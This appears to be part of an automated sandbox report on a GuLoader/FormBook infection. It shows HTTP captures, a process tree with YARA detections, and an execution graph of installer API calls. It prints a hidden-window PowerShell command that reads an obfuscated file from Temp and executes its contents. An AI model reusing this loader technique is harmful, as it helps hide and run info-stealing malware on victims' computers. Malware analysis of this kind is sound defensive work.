                                                                          Data Ascii: uVKlz=3q+B2rTmHcyTkI67tLIRSGK0TsE9vnGCNi59Zn96swaqzhpAZRKuxzp/CTEKZbDGfJkdaghZzRPdveqH/2FdrF5KVfdiBDvSaHDLvwtF+iMBYb+5HNlNHGLpyke8Kgznw7/9oNNgS9x2vClh2RmtkoS7khojqn4c252kD1/235FzaqXUpT52Vnoe2tKp7mo5PepwBLwmjDp2kC0W4OPpJs2dswp79tSzBw==
                                                                          Dec 10, 2024 13:54:01.890028000 CET364INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Tue, 10 Dec 2024 12:54:01 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Encoding: gzip
                                                                          Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 96 d9 7e 46 be a6 3e b9 41 a6 be 2e 6e f9 a9 21 81 a5 c9 1e 5e 65 fe 59 e9 a6 be 21 ae b6 ea 9a 36 fa 50 13 01 d5 3c 51 f2 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 67)N.,(ON,VPV/Ji%IAf>~F>A.n!^eY!6P<QZ0


                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Click to dive into process behavior distribution

                                                                          Click to jump to process

                                                                          Target ID:0
                                                                          Start time:07:51:52
                                                                          Start date:10/12/2024
                                                                          Path:C:\Users\user\Desktop\Forhandlingsfriheden.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\Forhandlingsfriheden.exe"
                                                                          Imagebase:0x400000
                                                                          File size:801'513 bytes
                                                                          MD5 hash:B149B18BE3FEC4CF93173C200384222C
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:2
                                                                          Start time:07:51:53
                                                                          Start date:10/12/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:powershell.exe -windowstyle hidden "$Vibss=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bionomic\bambusmbler.gud';$Kunstvrkets=$Vibss.SubString(75330,3);.$Kunstvrkets($Vibss)
                                                                          Imagebase:0xbb0000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2803507760.000000000A274000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:3
                                                                          Start time:07:51:53
                                                                          Start date:10/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:6
                                                                          Start time:07:53:03
                                                                          Start date:10/12/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\Opfattelsers.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\Opfattelsers.exe"
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:801'513 bytes
                                                                          MD5 hash:B149B18BE3FEC4CF93173C200384222C
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3053262929.000000001F460000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3053719794.0000000020EC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.3027521068.0000000002BA4000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 18%, ReversingLabs
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:8
                                                                          Start time:07:53:18
                                                                          Start date:10/12/2024
                                                                          Path:C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe"
                                                                          Imagebase:0x380000
                                                                          File size:140'800 bytes
                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3361007357.00000000042C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:9
                                                                          Start time:07:53:20
                                                                          Start date:10/12/2024
                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\SysWOW64\svchost.exe"
                                                                          Imagebase:0x190000
                                                                          File size:46'504 bytes
                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3360830946.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3360872808.0000000003290000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:11
                                                                          Start time:07:53:46
                                                                          Start date:10/12/2024
                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                          Imagebase:0x7ff728280000
                                                                          File size:676'768 bytes
                                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:19%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:17%
                                                                            Total number of Nodes:1371
                                                                            Total number of Limit Nodes:24
                                                                            execution_graph 3236 401bc0 3237 401c11 3236->3237 3243 401bcd 3236->3243 3239 401c16 3237->3239 3240 401c3b GlobalAlloc 3237->3240 3238 4023af 3242 40657e 21 API calls 3238->3242 3250 401c56 3239->3250 3274 406541 lstrcpynW 3239->3274 3255 40657e 3240->3255 3245 4023bc 3242->3245 3243->3238 3246 401be4 3243->3246 3275 405ba1 3245->3275 3272 406541 lstrcpynW 3246->3272 3247 401c28 GlobalFree 3247->3250 3251 401bf3 3273 406541 lstrcpynW 3251->3273 3253 401c02 3279 406541 lstrcpynW 3253->3279 3270 406589 3255->3270 3256 4067d0 3257 4067e9 3256->3257 3302 406541 lstrcpynW 3256->3302 3257->3250 3259 4067a1 lstrlenW 3259->3270 3263 40669a GetSystemDirectoryW 3263->3270 3264 40657e 15 API calls 3264->3259 3265 4066b0 GetWindowsDirectoryW 3265->3270 3266 406742 lstrcatW 3266->3270 3268 40657e 15 API calls 3268->3270 3270->3256 3270->3259 3270->3263 3270->3264 3270->3265 3270->3266 3270->3268 3271 406712 SHGetPathFromIDListW CoTaskMemFree 3270->3271 3280 40640f 3270->3280 3285 406935 GetModuleHandleA 3270->3285 3291 4067ef 3270->3291 3300 406488 wsprintfW 3270->3300 3301 406541 lstrcpynW 3270->3301 3271->3270 3272->3251 3273->3253 3274->3247 3276 405bb6 3275->3276 3277 405c02 3276->3277 3278 405bca MessageBoxIndirectW 3276->3278 3277->3250 3278->3277 3279->3250 3303 4063ae 3280->3303 3283 406443 RegQueryValueExW RegCloseKey 3284 406473 3283->3284 3284->3270 3286 406951 3285->3286 3287 40695b GetProcAddress 3285->3287 3307 4068c5 GetSystemDirectoryW 3286->3307 3289 40696a 3287->3289 3289->3270 3290 406957 3290->3287 3290->3289 3292 4067fc 3291->3292 3294 406865 CharNextW 3292->3294 3295 406872 3292->3295 3298 406851 CharNextW 3292->3298 3299 406860 CharNextW 3292->3299 3310 405e3d 3292->3310 3293 406877 CharPrevW 3293->3295 3294->3292 3294->3295 3295->3293 3296 406898 3295->3296 3296->3270 3298->3292 3299->3294 3300->3270 3301->3270 3302->3257 3304 4063bd 3303->3304 3305 4063c6 RegOpenKeyExW 3304->3305 3306 4063c1 3304->3306 3305->3306 3306->3283 3306->3284 3308 4068e7 wsprintfW LoadLibraryExW 3307->3308 3308->3290 3311 405e43 3310->3311 3312 405e59 3311->3312 3313 405e4a CharNextW 3311->3313 3312->3292 3313->3311 3314 403fc1 3315 403fd9 3314->3315 3316 40413a 3314->3316 3315->3316 3317 403fe5 3315->3317 3318 40418b 3316->3318 3319 40414b GetDlgItem GetDlgItem 3316->3319 3320 403ff0 SetWindowPos 3317->3320 3321 404003 3317->3321 3323 4041e5 3318->3323 3334 401389 2 API calls 3318->3334 3322 4044c0 22 API calls 3319->3322 3320->3321 3325 40400c ShowWindow 3321->3325 3326 40404e 3321->3326 3327 404175 SetClassLongW 3322->3327 3328 404135 3323->3328 3387 40450c 3323->3387 3329 404127 3325->3329 3330 40402c GetWindowLongW 3325->3330 3331 404056 DestroyWindow 3326->3331 3332 40406d 3326->3332 3333 40140b 2 API calls 3327->3333 3409 404527 3329->3409 3330->3329 3336 404045 ShowWindow 3330->3336 3386 404449 3331->3386 3337 404072 SetWindowLongW 3332->3337 3338 404083 3332->3338 3333->3318 3339 4041bd 3334->3339 3336->3326 3337->3328 3338->3329 3342 40408f GetDlgItem 3338->3342 3339->3323 3343 4041c1 SendMessageW 3339->3343 3340 40140b 2 API calls 3356 4041f7 3340->3356 3341 40444b DestroyWindow EndDialog 3341->3386 3345 4040a0 SendMessageW IsWindowEnabled 3342->3345 3346 4040bd 3342->3346 3343->3328 3344 40447a ShowWindow 3344->3328 3345->3328 3345->3346 3348 4040ca 3346->3348 3349 404111 SendMessageW 3346->3349 3350 4040dd 3346->3350 3359 4040c2 3346->3359 3347 40657e 21 API calls 3347->3356 3348->3349 3348->3359 3349->3329 3353 4040e5 3350->3353 3354 4040fa 3350->3354 3352 4044c0 22 API calls 3352->3356 3403 40140b 3353->3403 3358 40140b 2 API calls 3354->3358 3355 4040f8 3355->3329 3356->3328 3356->3340 3356->3341 3356->3347 3356->3352 3377 40438b DestroyWindow 3356->3377 3390 4044c0 3356->3390 3360 404101 3358->3360 3406 404499 3359->3406 3360->3329 3360->3359 3362 404272 GetDlgItem 3363 404287 3362->3363 3364 40428f ShowWindow KiUserCallbackDispatcher 3362->3364 3363->3364 3393 4044e2 KiUserCallbackDispatcher 3364->3393 3366 4042b9 EnableWindow 3371 4042cd 3366->3371 3367 4042d2 GetSystemMenu EnableMenuItem SendMessageW 3368 404302 SendMessageW 3367->3368 3367->3371 3368->3371 3371->3367 3394 4044f5 SendMessageW 3371->3394 3395 403fa2 3371->3395 3398 406541 lstrcpynW 3371->3398 3373 404331 lstrlenW 3374 40657e 21 API calls 3373->3374 3375 404347 SetWindowTextW 3374->3375 3399 401389 3375->3399 3378 4043a5 CreateDialogParamW 3377->3378 3377->3386 3379 4043d8 3378->3379 3378->3386 3380 4044c0 22 API calls 3379->3380 3381 4043e3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3380->3381 3382 401389 2 API calls 3381->3382 3383 404429 3382->3383 3383->3328 3384 404431 ShowWindow 3383->3384 3385 40450c SendMessageW 3384->3385 3385->3386 3386->3328 3386->3344 3388 404524 3387->3388 3389 404515 SendMessageW 3387->3389 3388->3356 3389->3388 3391 40657e 21 API calls 3390->3391 3392 4044cb SetDlgItemTextW 3391->3392 3392->3362 3393->3366 3394->3371 3396 40657e 21 API calls 3395->3396 3397 403fb0 SetWindowTextW 3396->3397 3397->3371 3398->3373 3401 401390 3399->3401 3400 4013fe 3400->3356 3401->3400 3402 4013cb MulDiv SendMessageW 3401->3402 3402->3401 3404 401389 2 API calls 3403->3404 3405 401420 3404->3405 3405->3359 3407 4044a0 3406->3407 3408 4044a6 SendMessageW 3406->3408 3407->3408 3408->3355 3410 4045ea 3409->3410 3411 40453f GetWindowLongW 3409->3411 3410->3328 3411->3410 3412 404554 3411->3412 3412->3410 3413 404581 GetSysColor 3412->3413 3414 404584 3412->3414 3413->3414 3415 404594 SetBkMode 3414->3415 3416 40458a SetTextColor 3414->3416 3417 4045b2 3415->3417 3418 4045ac GetSysColor 3415->3418 3416->3415 3419 4045c3 3417->3419 3420 4045b9 SetBkColor 3417->3420 3418->3417 3419->3410 3421 4045d6 DeleteObject 3419->3421 3422 4045dd CreateBrushIndirect 3419->3422 3420->3419 3421->3422 3422->3410 4027 402641 4028 402dcb 21 API calls 4027->4028 4029 402648 4028->4029 4032 406031 GetFileAttributesW CreateFileW 4029->4032 4031 402654 4032->4031 4040 4025c3 4050 402e0b 4040->4050 4043 402da9 21 API calls 4044 4025d6 4043->4044 4045 4025f2 RegEnumKeyW 4044->4045 4046 4025fe RegEnumValueW 4044->4046 4048 402953 4044->4048 4047 402613 RegCloseKey 4045->4047 4046->4047 4047->4048 4051 402dcb 21 API calls 4050->4051 4052 402e22 4051->4052 4053 4063ae RegOpenKeyExW 4052->4053 4054 4025cd 4053->4054 4054->4043 3631 4015c8 3632 402dcb 21 API calls 3631->3632 3633 4015cf SetFileAttributesW 3632->3633 3634 4015e1 3633->3634 3640 401fc9 3641 402dcb 21 API calls 3640->3641 3642 401fcf 3641->3642 3643 4055c6 28 API calls 3642->3643 3644 401fd9 3643->3644 3655 405b24 CreateProcessW 3644->3655 3647 402002 CloseHandle 3651 402953 3647->3651 3650 401ff4 3652 402004 3650->3652 3653 401ff9 3650->3653 3652->3647 3663 406488 wsprintfW 3653->3663 3656 401fdf 3655->3656 3657 405b57 CloseHandle 3655->3657 3656->3647 3656->3651 3658 4069e0 WaitForSingleObject 3656->3658 3657->3656 3659 4069fa 3658->3659 3660 406a0c GetExitCodeProcess 3659->3660 3664 406971 3659->3664 3660->3650 3663->3647 3665 40698e PeekMessageW 3664->3665 3666 406984 DispatchMessageW 3665->3666 3667 40699e WaitForSingleObject 3665->3667 3666->3665 3667->3659 4058 40204f 4059 402dcb 21 API calls 4058->4059 4060 402056 4059->4060 4061 406935 5 API calls 4060->4061 4062 402065 4061->4062 4063 402081 GlobalAlloc 4062->4063 4064 4020f1 4062->4064 4063->4064 4065 402095 4063->4065 4066 406935 5 API calls 4065->4066 4067 40209c 4066->4067 4068 406935 5 API calls 4067->4068 4069 4020a6 4068->4069 4069->4064 4073 406488 wsprintfW 4069->4073 4071 4020df 4074 406488 wsprintfW 4071->4074 4073->4071 4074->4064 4075 40254f 4076 402e0b 21 API calls 4075->4076 4077 402559 4076->4077 4078 402dcb 21 API calls 4077->4078 4079 402562 4078->4079 4080 40256d RegQueryValueExW 4079->4080 4085 402953 4079->4085 4081 402593 RegCloseKey 4080->4081 4082 40258d 4080->4082 4081->4085 4082->4081 4086 406488 wsprintfW 4082->4086 4086->4081 4087 4021cf 4088 402dcb 21 API calls 4087->4088 4089 4021d6 4088->4089 4090 402dcb 21 API calls 4089->4090 4091 4021e0 4090->4091 4092 402dcb 21 API calls 4091->4092 4093 4021ea 4092->4093 4094 402dcb 21 API calls 4093->4094 4095 4021f4 4094->4095 4096 402dcb 21 API calls 4095->4096 4097 4021fe 4096->4097 4098 40223d CoCreateInstance 4097->4098 4099 402dcb 21 API calls 4097->4099 4102 40225c 4098->4102 4099->4098 4100 401423 28 API calls 4101 40231b 4100->4101 4102->4100 4102->4101 4103 403bd1 4104 403bdc 4103->4104 4105 403be3 GlobalAlloc 4104->4105 4106 403be0 4104->4106 4105->4106 4114 401a55 4115 402dcb 21 API calls 4114->4115 4116 401a5e ExpandEnvironmentStringsW 4115->4116 4117 401a72 4116->4117 4118 401a85 4116->4118 4117->4118 4119 401a77 lstrcmpW 4117->4119 4119->4118 4120 4014d7 4121 402da9 21 API calls 4120->4121 4122 4014dd Sleep 4121->4122 4124 402c4f 4122->4124 4130 4023d7 4131 4023df 4130->4131 4134 4023e5 4130->4134 4132 402dcb 21 API calls 4131->4132 4132->4134 4133 4023f3 4136 402401 4133->4136 4137 402dcb 21 API calls 4133->4137 4134->4133 4135 402dcb 21 API calls 4134->4135 4135->4133 4138 402dcb 21 API calls 4136->4138 4137->4136 4139 40240a WritePrivateProfileStringW 4138->4139 4140 402459 4141 402461 4140->4141 4142 40248c 4140->4142 4143 402e0b 21 API calls 4141->4143 4144 402dcb 21 API calls 4142->4144 4145 402468 4143->4145 4146 402493 4144->4146 4148 402dcb 21 API calls 4145->4148 4150 4024a0 4145->4150 4151 402e89 4146->4151 4149 402479 RegDeleteValueW RegCloseKey 4148->4149 4149->4150 4152 402e9d 4151->4152 4153 402e96 4151->4153 4152->4153 4155 402ece 4152->4155 4153->4150 4156 4063ae RegOpenKeyExW 4155->4156 4158 402efc 4156->4158 4157 402fa6 4157->4153 4158->4157 4159 402f0c RegEnumValueW 4158->4159 4163 402f2f 4158->4163 4160 402f96 RegCloseKey 4159->4160 4159->4163 4160->4157 4161 402f6b RegEnumKeyW 4162 402f74 RegCloseKey 4161->4162 4161->4163 4164 406935 5 API calls 4162->4164 4163->4160 4163->4161 4163->4162 4165 402ece 6 API calls 4163->4165 4166 402f84 4164->4166 4165->4163 4166->4157 4167 402f88 RegDeleteKeyW 4166->4167 4167->4157 4168 40175a 4169 402dcb 21 API calls 4168->4169 4170 401761 SearchPathW 4169->4170 4171 40177c 4170->4171 4172 401d5d 4173 402da9 21 API calls 4172->4173 4174 401d64 4173->4174 4175 402da9 21 API calls 4174->4175 4176 401d70 GetDlgItem 4175->4176 4177 40265d 4176->4177 4178 406c5f 4184 406ae3 4178->4184 4179 40744e 4180 406b64 GlobalFree 4181 406b6d GlobalAlloc 4180->4181 4181->4179 4181->4184 4182 406be4 GlobalAlloc 4182->4179 4182->4184 4183 406bdb GlobalFree 4183->4182 4184->4179 4184->4180 4184->4181 4184->4182 4184->4183 4185 402663 4186 402692 4185->4186 4187 402677 4185->4187 4189 4026c2 4186->4189 4190 402697 4186->4190 4188 402da9 21 API calls 4187->4188 4199 40267e 4188->4199 4192 402dcb 21 API calls 4189->4192 4191 402dcb 21 API calls 4190->4191 4193 40269e 4191->4193 4194 4026c9 lstrlenW 4192->4194 4202 406563 WideCharToMultiByte 4193->4202 4194->4199 4196 4026b2 lstrlenA 4196->4199 4197 4026f6 4198 40270c 4197->4198 4200 4060e3 WriteFile 4197->4200 4199->4197 4199->4198 4203 406112 SetFilePointer 4199->4203 4200->4198 4202->4196 4204 40612e 4203->4204 4205 406146 4203->4205 4206 4060b4 ReadFile 4204->4206 4205->4197 4207 40613a 4206->4207 4207->4205 4208 406177 SetFilePointer 4207->4208 4209 40614f SetFilePointer 4207->4209 4208->4205 4209->4208 4210 40615a 4209->4210 4211 4060e3 WriteFile 4210->4211 4211->4205 3592 4015e6 3593 402dcb 21 API calls 3592->3593 3594 4015ed 3593->3594 3612 405ebb CharNextW CharNextW 3594->3612 3596 401656 3598 401688 3596->3598 3599 40165b 3596->3599 3597 405e3d CharNextW 3605 4015f6 3597->3605 3602 401423 28 API calls 3598->3602 3618 401423 3599->3618 3609 401680 3602->3609 3605->3596 3605->3597 3608 40163c GetFileAttributesW 3605->3608 3610 40161f 3605->3610 3622 405b0c 3605->3622 3628 405aef CreateDirectoryW 3605->3628 3607 40166f SetCurrentDirectoryW 3607->3609 3608->3605 3610->3605 3625 405a95 CreateDirectoryW 3610->3625 3613 405ed8 3612->3613 3615 405eea 3612->3615 3614 405ee5 CharNextW 3613->3614 3613->3615 3617 405f0e 3614->3617 3616 405e3d CharNextW 3615->3616 3615->3617 3616->3615 3617->3605 3619 4055c6 28 API calls 3618->3619 3620 401431 3619->3620 3621 406541 lstrcpynW 3620->3621 3621->3607 3623 406935 5 API calls 3622->3623 3624 405b13 3623->3624 3624->3605 3626 405ae1 3625->3626 3627 405ae5 GetLastError 3625->3627 3626->3610 3627->3626 3629 405b03 GetLastError 3628->3629 3630 405aff 3628->3630 3629->3630 3630->3605 4218 401c68 4219 402da9 21 API calls 4218->4219 4220 401c6f 4219->4220 4221 402da9 21 API calls 4220->4221 4222 401c7c 4221->4222 4223 401c91 4222->4223 4224 402dcb 21 API calls 4222->4224 4225 401ca1 4223->4225 4226 402dcb 21 API calls 4223->4226 4224->4223 4227 401cf8 4225->4227 4228 401cac 4225->4228 4226->4225 4229 402dcb 21 API calls 4227->4229 4230 402da9 21 API calls 4228->4230 4232 401cfd 4229->4232 4231 401cb1 4230->4231 4233 402da9 21 API calls 4231->4233 4234 402dcb 21 API calls 4232->4234 4235 401cbd 4233->4235 4236 401d06 FindWindowExW 4234->4236 4237 401ce8 SendMessageW 4235->4237 4238 401cca SendMessageTimeoutW 4235->4238 4239 401d28 4236->4239 4237->4239 4238->4239 4247 4028e9 4248 4028ef 4247->4248 4249 4028f7 FindClose 4248->4249 4250 402c4f 4248->4250 4249->4250 4251 40496a 4252 4049a0 4251->4252 4253 40497a 4251->4253 4254 404527 8 API calls 4252->4254 4255 4044c0 22 API calls 4253->4255 4257 4049ac 4254->4257 4256 404987 SetDlgItemTextW 4255->4256 4256->4252 4258 4016f1 4259 402dcb 21 API calls 4258->4259 4260 4016f7 GetFullPathNameW 4259->4260 4261 401711 4260->4261 4267 401733 4260->4267 4264 40689e 2 API calls 4261->4264 4261->4267 4262 401748 GetShortPathNameW 4263 402c4f 4262->4263 4265 401723 4264->4265 4265->4267 4268 406541 lstrcpynW 4265->4268 4267->4262 4267->4263 4268->4267 4269 401e73 GetDC 4270 402da9 21 API calls 4269->4270 4271 401e85 GetDeviceCaps MulDiv ReleaseDC 4270->4271 4272 402da9 21 API calls 4271->4272 4273 401eb6 4272->4273 4274 40657e 21 API calls 4273->4274 4275 401ef3 CreateFontIndirectW 4274->4275 4276 40265d 4275->4276 4277 402975 4278 402dcb 21 API calls 4277->4278 4279 402981 4278->4279 4280 402997 4279->4280 4281 402dcb 21 API calls 4279->4281 4282 40600c 2 API calls 4280->4282 4281->4280 4283 40299d 4282->4283 4305 406031 GetFileAttributesW CreateFileW 4283->4305 4285 4029aa 4286 402a60 4285->4286 4287 4029c5 GlobalAlloc 4285->4287 4288 402a48 4285->4288 4289 402a67 DeleteFileW 4286->4289 4290 402a7a 4286->4290 4287->4288 4291 4029de 4287->4291 4292 4032d9 39 API calls 4288->4292 4289->4290 4306 4034d4 SetFilePointer 4291->4306 4294 402a55 CloseHandle 4292->4294 4294->4286 4295 4029e4 4296 4034be ReadFile 4295->4296 4297 4029ed GlobalAlloc 4296->4297 4298 402a31 4297->4298 4299 4029fd 4297->4299 4301 4060e3 WriteFile 4298->4301 4300 4032d9 39 API calls 4299->4300 4304 402a0a 4300->4304 4302 402a3d GlobalFree 4301->4302 4302->4288 4303 402a28 GlobalFree 4303->4298 4304->4303 4305->4285 4306->4295 4307 4014f5 SetForegroundWindow 4308 402c4f 4307->4308 4309 4045f6 lstrcpynW lstrlenW 4310 40197b 4311 402dcb 21 API calls 4310->4311 4312 401982 lstrlenW 4311->4312 4313 40265d 4312->4313 4314 4020fd 4315 4021c1 4314->4315 4316 40210f 4314->4316 4319 401423 28 API calls 4315->4319 4317 402dcb 21 API calls 4316->4317 4318 402116 4317->4318 4320 402dcb 21 API calls 4318->4320 4324 40231b 4319->4324 4321 40211f 4320->4321 4322 402135 LoadLibraryExW 4321->4322 4323 402127 GetModuleHandleW 4321->4323 4322->4315 4325 402146 4322->4325 4323->4322 4323->4325 4334 4069a4 4325->4334 4328 402190 4331 4055c6 28 API calls 4328->4331 4329 402157 4330 402167 4329->4330 4332 401423 28 API calls 4329->4332 4330->4324 4333 4021b3 FreeLibrary 4330->4333 4331->4330 4332->4330 4333->4324 4339 406563 WideCharToMultiByte 4334->4339 4336 4069c1 4337 4069c8 GetProcAddress 4336->4337 4338 402151 4336->4338 4337->4338 4338->4328 4338->4329 4339->4336 4340 402b7e 4341 402bd0 4340->4341 4342 402b85 4340->4342 4343 406935 5 API calls 4341->4343 4345 402da9 21 API calls 4342->4345 4348 402bce 4342->4348 4344 402bd7 4343->4344 4346 402dcb 21 API calls 4344->4346 4347 402b93 4345->4347 4349 402be0 4346->4349 4350 402da9 21 API calls 4347->4350 4349->4348 4351 402be4 IIDFromString 4349->4351 4352 402b9f 4350->4352 4351->4348 4353 402bf3 4351->4353 4357 406488 wsprintfW 4352->4357 4353->4348 4358 406541 lstrcpynW 4353->4358 4355 402c10 CoTaskMemFree 4355->4348 4357->4348 4358->4355 4366 40467f 4367 404697 4366->4367 4373 4047b1 4366->4373 4371 4044c0 22 API calls 4367->4371 4368 40481b 4369 4048e5 4368->4369 4370 404825 GetDlgItem 4368->4370 4376 404527 8 API calls 4369->4376 4372 40483f 4370->4372 4377 4048a6 4370->4377 4375 4046fe 4371->4375 4372->4377 4381 404865 SendMessageW LoadCursorW SetCursor 4372->4381 4373->4368 4373->4369 4374 4047ec GetDlgItem SendMessageW 4373->4374 4399 4044e2 KiUserCallbackDispatcher 4374->4399 4379 4044c0 22 API calls 4375->4379 4380 4048e0 4376->4380 4377->4369 4382 4048b8 4377->4382 4384 40470b CheckDlgButton 4379->4384 4403 40492e 4381->4403 4386 4048ce 4382->4386 4387 4048be SendMessageW 4382->4387 4383 404816 4400 40490a 4383->4400 4397 4044e2 KiUserCallbackDispatcher 4384->4397 4386->4380 4388 4048d4 SendMessageW 4386->4388 4387->4386 4388->4380 4392 404729 GetDlgItem 4398 4044f5 SendMessageW 4392->4398 4394 40473f SendMessageW 4395 404765 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4394->4395 4396 40475c GetSysColor 4394->4396 4395->4380 4396->4395 4397->4392 4398->4394 4399->4383 4401 404918 4400->4401 4402 40491d SendMessageW 4400->4402 4401->4402 4402->4368 4406 405b67 ShellExecuteExW 4403->4406 4405 404894 LoadCursorW SetCursor 4405->4377 4406->4405 4407 401000 4408 401037 BeginPaint GetClientRect 4407->4408 4409 40100c DefWindowProcW 4407->4409 4411 4010f3 4408->4411 4412 401179 4409->4412 4413 401073 CreateBrushIndirect FillRect DeleteObject 4411->4413 4414 4010fc 4411->4414 4413->4411 4415 401102 CreateFontIndirectW 4414->4415 4416 401167 EndPaint 4414->4416 4415->4416 4417 401112 6 API calls 4415->4417 4416->4412 4417->4416 4418 402a80 4419 402da9 21 API calls 4418->4419 4420 402a86 4419->4420 4421 402ac9 4420->4421 4422 402aad 4420->4422 4427 402953 4420->4427 4424 402ae3 4421->4424 4425 402ad3 4421->4425 4423 402ab2 4422->4423 4431 402ac3 4422->4431 4432 406541 lstrcpynW 4423->4432 4426 40657e 21 API calls 4424->4426 4428 402da9 21 API calls 4425->4428 4426->4431 4428->4431 4431->4427 4433 406488 wsprintfW 4431->4433 4432->4427 4433->4427 4434 401781 4435 402dcb 21 API calls 4434->4435 4436 401788 4435->4436 4437 406060 2 API calls 4436->4437 4438 40178f 4437->4438 4438->4438 4439 401d82 4440 402da9 21 API calls 4439->4440 4441 401d93 SetWindowLongW 4440->4441 4442 402c4f 4441->4442 3423 401f03 3431 402da9 3423->3431 3425 401f09 3426 402da9 21 API calls 3425->3426 3427 401f15 3426->3427 3428 401f21 ShowWindow 3427->3428 3429 401f2c EnableWindow 3427->3429 3430 402c4f 3428->3430 3429->3430 3432 40657e 21 API calls 3431->3432 3433 402dbe 3432->3433 3433->3425 4443 401503 4444 401508 4443->4444 4446 40152e 4443->4446 4445 402da9 21 API calls 4444->4445 4445->4446 4447 402903 4448 40290b 4447->4448 4449 40290f FindNextFileW 4448->4449 4450 402921 4448->4450 4449->4450 4451 402968 4449->4451 4453 406541 lstrcpynW 4451->4453 4453->4450 3537 405705 3538 405726 GetDlgItem GetDlgItem GetDlgItem 3537->3538 3539 4058af 3537->3539 3582 4044f5 SendMessageW 3538->3582 3541 4058e0 3539->3541 3542 4058b8 GetDlgItem CreateThread CloseHandle 3539->3542 3544 40590b 3541->3544 3545 405930 3541->3545 3546 4058f7 ShowWindow ShowWindow 